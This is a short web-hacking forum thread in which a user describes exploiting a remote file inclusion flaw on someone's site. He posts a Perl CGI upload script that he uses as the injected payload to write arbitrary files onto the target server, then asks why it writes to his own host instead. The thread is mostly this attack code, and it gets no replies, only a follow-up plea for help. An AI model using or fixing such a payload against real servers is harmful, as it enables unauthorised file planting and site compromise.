Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Perl rfi

  1. Home
  2. Forum
  3. Web hacking
  4. Perl rfi

clone4's Avatar

clone4

Perl-6 Wisdom Seeker
0 0

ok so there is page vulnerable for rfi, but executes only perl scripts, I use script


#!C:/Perl/bin/perl.exe

use CGI;
use File::Basename;

my $file_location = "../";
my $query = new CGI;
my $filename = $query->param("file");

my $upload_filehandle = $query->upload("file");

open ( UPLOADFILE, ">$file_location/$filename" ) ;


while ( <$upload_filehandle> )
{

print $query->header ( );
print $file_location;
print UPLOADFILE;
}

close UPLOADFILE;

but even despite this script is executed by the remote server, file is uploaded on the server where is the script, and since I use relative path it should work properly, any ideas why is that happening ?

thx


clone4's Avatar

clone4

Perl-6 Wisdom Seeker
0 0

nothing ?:(:(

making sad eyes so somebody would help

brb don't know what's wrong, I've double checked everything, and script really is executed on the server, and there seem to be no restrictions regarding to it